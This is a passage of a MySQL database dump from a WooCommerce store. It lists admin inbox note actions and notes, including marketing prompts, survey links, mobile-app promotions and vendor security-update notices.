(9220,90,'TikTok q2_2022','Promote my products on TikTok','https://woocommerce.com/products/tiktok-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=TikTok%20q2_2022','unactioned',1,'',NULL,NULL),
(9513,91,'tiktok-webinar-promo-july2022-button','RSVP Now','https://gettingstartedwithtiktokforwoocommerce.splashthat.com/','actioned',1,'',NULL,NULL),
(10339,80,'setup_task_initiative_survey_q2_2022_share_your_input','Share your input','https://t.maze.co/87390007','actioned',0,'',NULL,NULL),
(10700,48,'learn-more','Learn more','https://woocommerce.com/mobile/?utm_source=inbox&utm_medium=product','actioned',0,'',NULL,NULL),
(11070,93,'klarna_q3_2022','Grow with Klarna','https://woocommerce.com/products/klarna-payments?utm_source=inbox_note&utm_medium=product&utm_campaign=klarna_q3_2022','unactioned',0,'',NULL,NULL),
(11446,92,'mercado_pago_q3_2022','Free download','https://woocommerce.com/products/mercado-pago-checkout/?utm_source=inbox_note&utm_medium=product&utm_campaign=mercado_pago_q3_2022','unactioned',0,'',NULL,NULL),
(11452,96,'mobile_app_order_management_q3_2022','Get the WooCommerce Mobile App','https://woocommerce.com/mobile/?utm_source=inbox_note&utm_medium=product&utm_campaign=mobile_app_order_management_q3_2022','actioned',0,'',NULL,NULL),
(12033,98,'product_creation_usability_test_6_months_take_a_look','Try it now','https://t.maze.co/103446424','unactioned',0,'',NULL,NULL),
(12034,99,'product_creation_usability_test_12_months_take_a_look','Try it now','https://t.maze.co/103446424','unactioned',0,'',NULL,NULL),
(12035,97,'product_creation_usability_test_3_months_take_a_look','Try it now','https://t.maze.co/103446424','unactioned',0,'',NULL,NULL),
(12195,100,'cta_customize_your_deposits','Customize your deposits','https://woocommerce.com/payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=cta_customize_your_deposits','actioned',0,'',NULL,NULL),
(12196,100,'dismiss_customize_your_deposits','Dismiss','','actioned',0,'',NULL,NULL),
(12971,103,'pre-black-friday-sale-2022-announcement','Shop the sale','https://woocommerce.com/marketplace-sale/?utm_source=inbox_note&utm_medium=product&utm_campaign=pre-black-friday-sale-2022-announcement','actioned',0,'',NULL,NULL),
(12975,61,'wc_shipping_mobile_app_q4_2021','Get the WooCommerce Mobile App','https://woocommerce.com/mobile/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_shipping_mobile_app_q4_2021','actioned',0,'',NULL,NULL),
(12976,4,'set-up-concierge','Schedule free session','https://wordpress.com/me/concierge','actioned',0,'',NULL,NULL),
(12978,6,'learn-more-ecomm-unique-shopping-experience','Learn more','https://docs.woocommerce.com/document/product-add-ons/?utm_source=inbox','actioned',0,'',NULL,NULL),
(12979,22,'watch-the-webinar','Watch the webinar','https://youtu.be/V_2XtCOyZ7o','actioned',0,'',NULL,NULL),
(12982,28,'learn-more','Learn more','https://woocommerce.com/posts/first-things-customize-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned',0,'',NULL,NULL),
(13011,101,'googlelistings_signals2022_hasGLA_click','Connect Google Listings & Ads','http://ictbank.ir/blog/wp-admin/admin.php?page=wc-admin&path=marketing','unactioned',0,'',NULL,NULL),
(13012,102,'googlelistings_signals2022_noGLA','Connect Google Listings & Ads','https://woocommerce.com/products/google-listings-and-ads/?utm_medium=product&utm_source=inbox_note&utm_campaign=googlelistings_signals2022_noGLA','unactioned',0,'',NULL,NULL),
(13251,36,'update-db_run','Update WooCommerce Database','http://ictbank.ir/blog/wp-admin/plugins.php?action=deactivate&plugin=woocommerce%2Fwoocommerce.php&plugin_status=all&paged=1&s&do_update_woocommerce=true','unactioned',0,'wc_db_update','wc_db_update','wc_db_update_nonce'),
(13252,36,'update-db_learn-more','Learn more about updates','https://docs.woocommerce.com/document/how-to-update-woocommerce/','unactioned',0,'',NULL,NULL),
(13253,58,'browse_extensions','Browse extensions','http://ictbank.ir/blog/wp-admin/admin.php?page=wc-addons','unactioned',0,'',NULL,NULL),
(13254,59,'wayflyer_bnpl_q4_2021','Level up with funding','https://woocommerce.com/products/wayflyer/?utm_source=inbox_note&utm_medium=product&utm_campaign=wayflyer_bnpl_q4_2021','actioned',0,'',NULL,NULL),
(13255,60,'wc_shipping_mobile_app_usps_q4_2021','Get WooCommerce Shipping','https://woocommerce.com/woocommerce-shipping/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_shipping_mobile_app_usps_q4_2021','actioned',0,'',NULL,NULL),
(13256,5,'learn-more','Learn more','https://docs.woocommerce.com/document/woocommerce-shipping-and-tax/?utm_source=inbox','unactioned',0,'',NULL,NULL),
(13257,21,'learn-more','Learn more','https://woocommerce.com/posts/ecommerce-shipping-solutions-guide/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','actioned',0,'',NULL,NULL),
(13258,27,'optimizing-the-checkout-flow','Learn more','https://woocommerce.com/posts/optimizing-woocommerce-checkout?utm_source=inbox_note&utm_medium=product&utm_campaign=optimizing-the-checkout-flow','actioned',0,'',NULL,NULL),
(13259,35,'qualitative-feedback-from-new-users','Share feedback','https://automattic.survey.fm/wc-pay-new','actioned',0,'',NULL,NULL),
(13260,39,'share-feedback','Share feedback','http://automattic.survey.fm/paypal-feedback','unactioned',0,'',NULL,NULL),
(13261,42,'get-started','Get started','https://woocommerce.com/products/google-listings-and-ads?utm_source=inbox_note&utm_medium=product&utm_campaign=get-started','actioned',0,'',NULL,NULL),
(13262,41,'update-wc-subscriptions-3-0-15','View latest version','http://ictbank.ir/blog/wp-admin/&page=wc-addons§ion=helper','actioned',0,'',NULL,NULL),
(13263,43,'update-wc-core-5-4-0','How to update WooCommerce','https://docs.woocommerce.com/document/how-to-update-woocommerce/','actioned',0,'',NULL,NULL),
(13264,46,'ppxo-pps-install-paypal-payments-1','View upgrade guide','https://docs.woocommerce.com/document/woocommerce-paypal-payments/paypal-payments-upgrade-guide/','actioned',0,'',NULL,NULL),
(13265,47,'ppxo-pps-install-paypal-payments-2','View upgrade guide','https://docs.woocommerce.com/document/woocommerce-paypal-payments/paypal-payments-upgrade-guide/','actioned',0,'',NULL,NULL),
(13266,51,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned',0,'',NULL,NULL),
(13267,51,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),
(13268,52,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned',0,'',NULL,NULL),
(13269,52,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),
(13270,53,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned',0,'',NULL,NULL),
(13271,53,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),
(13272,54,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned',0,'',NULL,NULL),
(13273,54,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),
(13274,62,'share-feedback','Share feedback','https://automattic.survey.fm/store-management','unactioned',0,'',NULL,NULL),
(13275,63,'share-navigation-survey-feedback','Share feedback','https://automattic.survey.fm/feedback-on-woocommerce-navigation','actioned',0,'',NULL,NULL),
(13276,75,'learn-more','Learn more','https://developer.woocommerce.com/2022/03/10/woocommerce-3-5-10-6-3-1-security-releases/','unactioned',0,'',NULL,NULL),
(13277,75,'woocommerce-core-paypal-march-2022-dismiss','Dismiss','','actioned',0,'',NULL,NULL),
(13278,76,'learn-more','Learn more','https://developer.woocommerce.com/2022/03/10/woocommerce-3-5-10-6-3-1-security-releases/','unactioned',0,'',NULL,NULL),
(13279,76,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),
(13280,77,'pinterest_03_2022_update','Update Instructions','https://woocommerce.com/document/pinterest-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=pinterest_03_2022_update#section-3','actioned',0,'',NULL,NULL),
(13281,84,'store_setup_survey_survey_q2_2022_share_your_thoughts','Tell us how it’s going','https://automattic.survey.fm/store-setup-survey-2022','actioned',0,'',NULL,NULL),
(13282,89,'wc-admin-wisepad3','Grow my business offline','https://woocommerce.com/products/wisepad3-card-reader/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wisepad3','actioned',0,'',NULL,NULL),
(13283,94,'learn-more','Find out more','https://developer.woocommerce.com/2022/08/09/woocommerce-payments-3-9-4-4-5-1-security-releases/','unactioned',0,'',NULL,NULL),
(13284,94,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),
(13285,95,'learn-more','Find out more','https://developer.woocommerce.com/2022/08/09/woocommerce-payments-3-9-4-4-5-1-security-releases/','unactioned',0,'',NULL,NULL),
(13286,95,'dismiss','Dismiss','','actioned',0,'',NULL,NULL),
(13287,104,'shipping_category_q4_2022_click','Automate my shipping','https://woocommerce.com/product-category/woocommerce-extensions/shipping-delivery-and-fulfillment/?categoryIds=28685&collections=product&page=1&utm_source=inbox_note&utm_medium=product&utm_campaign=shipping_category_q4_2022_click','unactioned',0,'',NULL,NULL),
(13288,105,'woocommerce_admin_deprecation_q4_2022','Deactivate WooCommerce Admin','http://ictbank.ir/blog/wp-admin/plugins.php','actioned',0,'',NULL,NULL),
(13289,106,'tiktok-targeted-q4-2022-click','Launch a campaign','https://woocommerce.com/products/tiktok-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=tiktok-targeted-q4-2022-click','unactioned',0,'',NULL,NULL),
(13290,107,'paypal_paylater_g3_q4_22','Install PayPal Payments','https://woocommerce.com/products/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_paylater_g3_q4_22','unactioned',0,'',NULL,NULL),
(13291,108,'paypal_paylater_g2_q4_22','Install PayPal Payments','https://woocommerce.com/products/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_paylater_g2_q4_22','unactioned',0,'',NULL,NULL),
(13292,109,'google_listings_ads_custom_attribute_mapping_q4_2022','Learn more','https://woocommerce.com/document/google-listings-and-ads/?utm_source=inbox_note&utm_medium=product&utm_campaign=google_listings_ads_custom_attribute_mapping_q4_2022#attribute-mapping','actioned',0,'',NULL,NULL),
(13293,110,'wc-admin-manualauthcapture','Learn more','https://woocommerce.com/document/woocommerce-payments/settings-guide/authorize-and-capture/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-manualauthcapture','actioned',0,'',NULL,NULL);
/*!40000 ALTER TABLE `wp_wc_admin_note_actions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_admin_notes`
--
DROP TABLE IF EXISTS `wp_wc_admin_notes`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_admin_notes` (
`note_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL,
`type` varchar(20) NOT NULL,
`locale` varchar(20) NOT NULL,
`title` longtext NOT NULL,
`content` longtext NOT NULL,
`content_data` longtext DEFAULT NULL,
`status` varchar(200) NOT NULL,
`source` varchar(200) NOT NULL,
`date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`date_reminder` datetime DEFAULT NULL,
`is_snoozable` tinyint(1) NOT NULL DEFAULT 0,
`layout` varchar(20) NOT NULL DEFAULT '',
`image` varchar(200) DEFAULT NULL,
`is_deleted` tinyint(1) NOT NULL DEFAULT 0,
`icon` varchar(200) NOT NULL DEFAULT 'info',
`is_read` tinyint(1) NOT NULL DEFAULT 0,
PRIMARY KEY (`note_id`)
) ENGINE=InnoDB AUTO_INCREMENT=111 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_admin_notes`
--
LOCK TABLES `wp_wc_admin_notes` WRITE;
/*!40000 ALTER TABLE `wp_wc_admin_notes` DISABLE KEYS */;
INSERT INTO `wp_wc_admin_notes` VALUES
(1,'wc-admin-onboarding-email-marketing','info','en_US','Tips, product updates, and inspiration','We\'re here for you - get tips, product updates and inspiration straight to your email box','{}','unactioned','woocommerce-admin','2020-12-26 11:14:06',NULL,0,'plain','',0,'info',1),
(3,'wc-admin-wc-helper-connection','info','en_US','Connect to WooCommerce.com','Connect to get important product notifications and updates.','{}','unactioned','woocommerce-admin','2020-12-26 11:14:07',NULL,0,'plain','',0,'info',1),
(4,'ecomm-need-help-setting-up-your-store','info','en_US','Need help setting up your Store?','Schedule a free 30-min <a href=\"https://wordpress.com/support/concierge-support/\">quick start session</a> and get help from our specialists. We’re happy to walk through setup steps, show you around the WordPress.com dashboard, troubleshoot any issues you may have, and help you the find the features you need to accomplish your goals for your site.','{}','pending','woocommerce.com','2020-12-26 11:14:07',NULL,0,'plain','',0,'info',1),
(5,'woocommerce-services','info','en_US','WooCommerce Shipping & Tax','WooCommerce Shipping & Tax helps get your store \"ready to sell\" as quickly as possible. You create your products. We take care of tax calculation, payment processing, and shipping label printing! Learn more about the extension that you just installed.','{}','pending','woocommerce.com','2020-12-26 11:14:07',NULL,0,'plain','',0,'info',1),
(6,'ecomm-unique-shopping-experience','info','en_US','For a shopping experience as unique as your customers','Product Add-Ons allow your customers to personalize products while they\'re shopping on your online store. No more follow-up email requests—customers get what they want, before they\'re done checking out. Learn more about this extension that comes included in your plan.','{}','pending','woocommerce.com','2020-12-26 11:14:07',NULL,0,'plain','',0,'info',1),
(7,'wcpay-promo-2020-11','marketing','en_US','wcpay-promo-2020-11','wcpay-promo-2020-11','{}','pending','woocommerce.com','2020-12-26 11:14:07',NULL,0,'plain','',0,'info',1),
(8,'wcpay-subscriptions-2020-11','marketing','en_US','Manage subscriber payments from your store\'s dashboard','Securely accept cards and manage transactions right from your dashboard with <a href=\"https://woocommerce.com/payments/?utm_medium=notification&utm_source=product&utm_campaign=wcpay_ctrl20\" target=\"_blank\">WooCommerce Payments</a> – now supporting <a href=\"https://woocommerce.com/products/woocommerce-subscriptions/?utm_medium=notification&utm_source=product&utm_campaign=wcpay_ctrl20\" target=\"_blank\">WooCommerce Subscriptions</a>! <br /><br /><em>By clicking \"Install now,\" you agree to our <a href=\"https://wordpress.com/tos/?utm_medium=notification&utm_source=product&utm_campaign=wcpay_ctrl20\" target=\"_blank\">Terms of Service</a>.</em>','{}','pending','woocommerce.com','2020-12-26 11:14:07',NULL,0,'plain','',0,'info',1),
(9,'wcpay-promo-2020-12','marketing','en_US','wcpay-promo-2020-12','wcpay-promo-2020-12','{}','pending','woocommerce.com','2020-12-26 11:14:07',NULL,0,'plain','',0,'info',1),
(10,'wcpay-subscriptions-2020-12','marketing','en_US','Manage payments from your store\'s dashboard','Securely accept cards and manage transactions right from your dashboard with <a href=\"https://woocommerce.com/payments/?utm_medium=notification&utm_source=product&utm_campaign=wcpay_ctrl20\" target=\"_blank\">WooCommerce Payments</a>! Zero setup fees or monthly fees. Just pay-as-you-go, starting at just 2.9% + $0.30 per transaction for U.S.-issued cards. <br /><br /><em>By clicking \"Install now,\" you agree to our <a href=\"https://wordpress.com/tos/?utm_medium=notification&utm_source=product&utm_campaign=wcpay_ctrl20\" target=\"_blank\">Terms of Service</a>.</em>','{}','pending','woocommerce.com','2020-12-26 11:14:07',NULL,0,'plain','',0,'info',1),
(12,'wc-admin-orders-milestone','info','en_US','First order received','Congratulations on getting your first order! Now is a great time to learn how to manage your orders.','{}','unactioned','woocommerce-admin','2020-12-27 07:15:45',NULL,0,'plain','',0,'info',1),
(13,'wc-admin-mobile-app','info','en_US','Install Woo mobile app','Install the WooCommerce mobile app to manage orders, receive sales notifications, and view key metrics — wherever you are.','{}','unactioned','woocommerce-admin','2020-12-28 11:34:52',NULL,0,'plain','',0,'info',1),
(16,'wc-admin-usage-tracking-opt-in','info','en_US','Help WooCommerce improve with usage tracking','Gathering usage data allows us to improve WooCommerce. Your store will be considered as we evaluate new features, judge the quality of an update, or determine if an improvement makes sense. You can always visit the <a href=\"http://ictbank.ir/blog/wp-admin/admin.php?page=wc-settings&tab=advanced&section=woocommerce_com\" target=\"_blank\">Settings</a> and choose to stop sharing data. <a href=\"https://woocommerce.com/usage-tracking\" target=\"_blank\">Read more</a> about what data we collect.','{}','unactioned','woocommerce-admin','2021-01-02 11:14:18',NULL,0,'plain','',0,'info',1),
(17,'wc-admin-store-notice-giving-feedback-2','info','en_US','Give feedback','Now that you’ve chosen us as a partner, our goal is to make sure we\'re providing the right tools to meet your needs. We\'re looking forward to having your feedback on the store setup experience so we can improve it in the future.','{}','unactioned','woocommerce-admin','2021-01-03 11:19:15',NULL,0,'plain','',0,'info',1),
(18,'wc-admin-insight-first-sale','survey','en_US','Did you know?','A WooCommerce powered store needs on average 31 days to get the first sale. You\'re on the right track! Do you find this type of insight useful?','{}','unactioned','woocommerce-admin','2021-01-03 11:19:15',NULL,0,'plain','',0,'info',1),
(20,'wc-admin-customize-store-with-blocks','info','en_US','Customize your online store with WooCommerce blocks','With our blocks, you can select and display products, categories, filters, and more virtually anywhere on your site — no need to use shortcodes or edit lines of code. Learn more about how to use each one of them.','{}','unactioned','woocommerce-admin','2021-01-09 11:23:31',NULL,0,'plain','',0,'info',1),
(21,'your-first-product','info','en_US','Your first product','That’s huge! You’re well on your way to building a successful online store — now it’s time to think about how you’ll fulfill your orders.<br /><br />Read our shipping guide to learn best practices and options for putting together your shipping strategy. And for WooCommerce stores in the United States, you can print discounted shipping labels via USPS with <a href=\"https://href.li/?https://woocommerce.com/shipping\" target=\"_blank\">WooCommerce Shipping</a>.','{}','pending','woocommerce.com','2021-01-22 19:50:56',NULL,0,'plain','',0,'info',1),
(22,'wc-admin-getting-started-in-ecommerce','info','en_US','Getting Started in eCommerce - webinar','We want to make eCommerce and this process of getting started as easy as possible for you. Watch this webinar to get tips on how to have our store up and running in a breeze.','{}','pending','woocommerce.com','2021-01-27 11:17:05',NULL,0,'plain','',0,'info',1),
(23,'wc-square-apple-pay-boost-sales','marketing','en_US','Boost sales with Apple Pay','Now that you accept Apple Pay® with Square you can increase conversion rates by letting your customers know that Apple Pay® is available. Here’s a marketing guide to help you get started.','{}','pending','woocommerce.com','2021-02-12 11:14:22',NULL,0,'plain','',0,'info',1),
(24,'wc-square-apple-pay-grow-your-business','marketing','en_US','Grow your business with Square and Apple Pay ','Now more than ever, shoppers want a fast, simple, and secure online checkout experience. Increase conversion rates by letting your customers know that you now accept Apple Pay®.','{}','pending','woocommerce.com','2021-02-12 11:14:22',NULL,0,'plain','',0,'info',1),
(25,'facebook_pixel_api_2021','marketing','en_US','Improve the performance of your Facebook ads','Enable Facebook Pixel and Conversions API through the latest version of Facebook for WooCommerce for improved measurement and ad targeting capabilities.','{}','pending','woocommerce.com','2021-02-13 11:14:17',NULL,0,'plain','',0,'info',1),
(26,'facebook_ec_2021','marketing','en_US','Sync your product catalog with Facebook to help boost sales','A single click adds all products to your Facebook Business Page shop. Product changes are automatically synced, with the flexibility to control which products are listed.','{}','pending','woocommerce.com','2021-02-13 11:14:17',NULL,0,'plain','',0,'info',1),
(27,'wc-admin-optimizing-the-checkout-flow','info','en_US','Optimizing the checkout flow','It’s crucial to get your store’s checkout as smooth as possible to avoid losing sales. Let’s take a look at how you can optimize the checkout experience for your shoppers.','{}','unactioned','woocommerce.com','2021-05-20 12:20:42',NULL,0,'plain','',0,'info',0),
(28,'wc-admin-first-five-things-to-customize','info','en_US','The first 5 things to customize in your store','Deciding what to start with first is tricky. To help you properly prioritize, we’ve put together this short list of the first few things you should customize in WooCommerce.','{}','unactioned','woocommerce.com','2021-02-17 11:19:19',NULL,0,'plain','',0,'info',1),
(30,'wcpay-apple-pay-boost-sales','marketing','en_US','Boost sales with Apple Pay','Now that you accept Apple Pay® with WooCommerce Payments you can increase conversion rates by letting your customers know that Apple Pay® is available. Here’s a marketing guide to help you get started.','{}','pending','woocommerce.com','2021-03-20 11:15:30',NULL,0,'plain','',0,'info',1),
(31,'wcpay-apple-pay-grow-your-business','marketing','en_US','Grow your business with WooCommerce Payments and Apple Pay','Now more than ever, shoppers want a fast, simple, and secure online checkout experience. Increase conversion rates by letting your customers know that you now accept Apple Pay®.','{}','pending','woocommerce.com','2021-03-20 11:15:30',NULL,0,'plain','',0,'info',1),
(32,'wc-admin-real-time-order-alerts','info','en_US','Get real-time order alerts anywhere','Get notifications about store activity, including new orders and product reviews directly on your mobile devices with the Woo app.','{}','unactioned','woocommerce-admin','2021-03-26 11:23:11',NULL,0,'plain','',0,'info',1),
(33,'wcpay-apple-pay-is-now-available','marketing','en_US','Apple Pay is now available with WooCommerce Payments!','Increase your conversion rate by offering a fast and secure checkout with <a href=\"https://woocommerce.com/apple-pay/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_applepay\" target=\"_blank\">Apple Pay</a>®. It’s free to get started with <a href=\"https://woocommerce.com/payments/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_applepay\" target=\"_blank\">WooCommerce Payments</a>.','{}','pending','woocommerce.com','2021-03-31 11:18:48',NULL,0,'plain','',0,'info',1),
(34,'paypal_ppcp_gtm_2021','marketing','en_US','Offer more options with the new PayPal','Get the latest PayPal extension for a full suite of payment methods with extensive currency and country coverage.','{}','pending','woocommerce.com','2021-04-01 11:15:36',NULL,0,'plain','',0,'info',1),
(35,'wc-payments-qualitative-feedback','info','en_US','WooCommerce Payments setup - let us know what you think','Congrats on enabling WooCommerce Payments for your store. Please share your feedback in this 2 minute survey to help us improve the setup process.','{}','pending','woocommerce.com','2021-04-16 11:16:36',NULL,0,'plain','',0,'info',1),
(36,'wc-update-db-reminder','update','en_US','WooCommerce database update required','WooCommerce has been updated! To keep things running smoothly, we have to update your database to the newest version. The database update process runs in the background and may take a little while, so please be patient. Advanced users can alternatively update via <a href=\"https://github.com/woocommerce/woocommerce/wiki/Upgrading-the-database-using-WP-CLI\">WP CLI</a>.','{}','unactioned','woocommerce-core','2021-05-05 15:58:26',NULL,0,'plain','',0,'info',1),
(37,'wc-admin-choosing-a-theme','marketing','en_US','Choosing a theme?','Check out the themes that are compatible with WooCommerce and choose one aligned with your brand and business needs.','{}','unactioned','woocommerce-admin','2021-05-06 11:19:27',NULL,0,'plain','',0,'info',1),
(38,'wc-admin-insight-first-product-and-payment','survey','en_US','Insight','More than 80% of new merchants add the first product and have at least one payment method set up during the first week. We\'re here to help your business succeed! Do you find this type of insight useful?','{}','unactioned','woocommerce-admin','2021-05-06 11:19:27',NULL,0,'plain','',0,'info',1),
(39,'share-your-feedback-on-paypal','info','en_US','Share your feedback on PayPal','Share your feedback in this 2 minute survey about how we can make the process of accepting payments more useful for your store.','{}','pending','woocommerce.com','2021-05-14 11:14:12',NULL,0,'plain','',0,'info',1),
(40,'wcpay_instant_deposits_gtm_2021','marketing','en_US','Get paid within minutes – Instant Deposits for WooCommerce Payments','Stay flexible with immediate access to your funds when you need them – including nights, weekends, and holidays. With <a href=\"https://woocommerce.com/products/woocommerce-payments/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_instant_deposits\">WooCommerce Payments\'</a> new Instant Deposits feature, you’re able to transfer your earnings to a debit card within minutes.','{}','pending','woocommerce.com','2021-05-14 11:14:13',NULL,0,'plain','',0,'info',1),
(41,'wc-subscriptions-security-update-3-0-15','info','en_US','WooCommerce Subscriptions security update!','We recently released an important security update to WooCommerce Subscriptions. To ensure your site’s data is protected, please upgrade <strong>WooCommerce Subscriptions to version 3.0.15</strong> or later.<br /><br />Click the button below to view and update to the latest Subscriptions version, or log in to <a href=\"https://woocommerce.com/my-dashboard\">WooCommerce.com Dashboard</a> and navigate to your <strong>Downloads</strong> page.<br /><br />We recommend always using the latest version of WooCommerce Subscriptions, and other software running on your site, to ensure maximum security.<br /><br />If you have any questions we are here to help — just <a href=\"https://woocommerce.com/my-account/create-a-ticket/\">open a ticket</a>.','{}','pending','woocommerce.com','2021-06-03 14:35:16',NULL,0,'plain','',0,'info',0),
(42,'google_listings_and_ads_install','marketing','en_US','Drive traffic and sales with Google','Reach online shoppers to drive traffic and sales for your store by showcasing products across Google, for free or with ads.','{}','pending','woocommerce.com','2021-06-14 20:40:02',NULL,0,'plain','',0,'info',0),
(43,'woocommerce-core-update-5-4-0','info','en_US','Update to WooCommerce 5.4.1 now','WooCommerce 5.4.1 addresses a checkout issue discovered in WooCommerce 5.4. We recommend upgrading to WooCommerce 5.4.1 as soon as possible.','{}','pending','woocommerce.com','2021-06-14 20:40:02',NULL,0,'plain','',0,'info',0),
(44,'wcpay-promo-2021-6-incentive-1','marketing','en_US','Simplify the payments process for you and your customers with WooCommerce Payments','With <a href=\"https://woocommerce.com/payments/?utm_medium=notification&utm_source=product&utm_campaign=wcpay601\">WooCommerce Payments</a>, you can securely accept all major cards, Apple Pay®, and recurring revenue in over 100 currencies. \n Built into your store’s WooCommerce dashboard, track cash flow and manage all of your transactions in one place – with no setup costs or monthly fees.\n <br /><br />\n By clicking \"Get WooCommerce Payments,\" you agree to the <a href=\"https://wordpress.com/tos/?utm_medium=notification&utm_source=product&utm_campaign=wcpay601\">Terms of Service</a> \n and acknowledge you have read the <a href=\"https://automattic.com/privacy/\">Privacy Policy</a>.\n ','{}','pending','woocommerce.com','2021-06-14 20:40:02',NULL,0,'plain','',0,'info',0),
(45,'wcpay-promo-2021-6-incentive-2','marketing','en_US','Simplify the payments process for you and your customers with WooCommerce Payments','With <a href=\"https://woocommerce.com/payments/?utm_medium=notification&utm_source=product&utm_campaign=wcpay601\">WooCommerce Payments</a>, you can securely accept all major cards, Apple Pay®, and recurring revenue in over 100 currencies. \n Built into your store’s WooCommerce dashboard, track cash flow and manage all of your transactions in one place – with no setup costs or monthly fees.\n <br /><br />\n By clicking \"Get WooCommerce Payments,\" you agree to the <a href=\"https://wordpress.com/tos/?utm_medium=notification&utm_source=product&utm_campaign=wcpay601\">Terms of Service</a> \n and acknowledge you have read the <a href=\"https://automattic.com/privacy/\">Privacy Policy</a>.\n ','{}','pending','woocommerce.com','2021-06-14 20:40:02',NULL,0,'plain','',0,'info',0),
(46,'ppxo-pps-upgrade-paypal-payments-1','info','en_US','Get the latest PayPal extension for WooCommerce','Heads up! There’s a new PayPal on the block!<br /><br />Now is a great time to upgrade to our latest <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">PayPal extension</a> to continue to receive support and updates with PayPal.<br /><br />Get access to a full suite of PayPal payment methods, extensive currency and country coverage, and pay later options with the all-new PayPal extension for WooCommerce.','{}','unactioned','woocommerce.com','2021-08-05 20:21:19',NULL,0,'plain','',0,'info',0),
(47,'ppxo-pps-upgrade-paypal-payments-2','info','en_US','Upgrade your PayPal experience!','Get access to a full suite of PayPal payment methods, extensive currency and country coverage, offer subscription and recurring payments, and the new PayPal pay later options.<br /><br />Start using our <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">latest PayPal today</a> to continue to receive support and updates.','{}','pending','woocommerce.com','2021-06-23 13:09:01',NULL,0,'plain','',0,'info',0),
(48,'wc-admin-manage-orders-on-the-go','info','en_US','Manage your orders on the go','Look for orders, customer info, and process refunds in one click with the Woo app.','{}','unactioned','woocommerce-admin','2021-06-24 19:49:15',NULL,0,'plain','',0,'info',0),
(49,'eu_vat_changes_2021','marketing','en_US','Get your business ready for the new EU tax regulations','On July 1, 2021, new taxation rules will come into play when the <a href=\"https://ec.europa.eu/taxation_customs/business/vat/modernising-vat-cross-border-ecommerce_en\">European Union (EU) Value-Added Tax (VAT) eCommerce package</a> takes effect.<br /><br />The new regulations will impact virtually every B2C business involved in cross-border eCommerce trade with the EU.<br /><br />We therefore recommend <a href=\"https://woocommerce.com/posts/new-eu-vat-regulations\">familiarizing yourself with the new updates</a>, and consult with a tax professional to ensure your business is following regulations and best practice.','{}','unactioned','woocommerce.com','2021-06-24 19:49:15',NULL,0,'plain','',0,'info',0),
(50,'wayflyer_q3_2021','marketing','en_US','Grow your revenue with Wayflyer financing and analytics','Flexible financing tailored to your needs by <a href=\"https://woocommerce.com/products/wayflyer/\">Wayflyer</a> – one fee, no interest rates, penalties, equity, or personal guarantees. Based on your store\'s performance, Wayflyer can provide the financing you need to grow and the analytical insights to help you spend it.','{}','pending','woocommerce.com','2021-07-15 11:26:02',NULL,0,'plain','',0,'info',0),
(51,'woocommerce-core-sqli-july-2021-need-to-update','update','en_US','Action required: Critical vulnerabilities in WooCommerce','In response to a critical vulnerability identified on July 13, 2021, we are working with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br />Our investigation into this vulnerability is ongoing, but <strong>we wanted to let you know now about the importance of updating immediately</strong>.<br /><br />For more information on which actions you should take, as well as answers to FAQs, please urgently review our blog post detailing this issue.','{}','pending','woocommerce.com','2021-07-16 11:17:41',NULL,0,'plain','',0,'info',0),
(52,'woocommerce-blocks-sqli-july-2021-need-to-update','update','en_US','Action required: Critical vulnerabilities in WooCommerce Blocks','In response to a critical vulnerability identified on July 13, 2021, we are working with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br />Our investigation into this vulnerability is ongoing, but <strong>we wanted to let you know now about the importance of updating immediately</strong>.<br /><br />For more information on which actions you should take, as well as answers to FAQs, please urgently review our blog post detailing this issue.','{}','pending','woocommerce.com','2021-07-16 11:17:41',NULL,0,'plain','',0,'info',0),
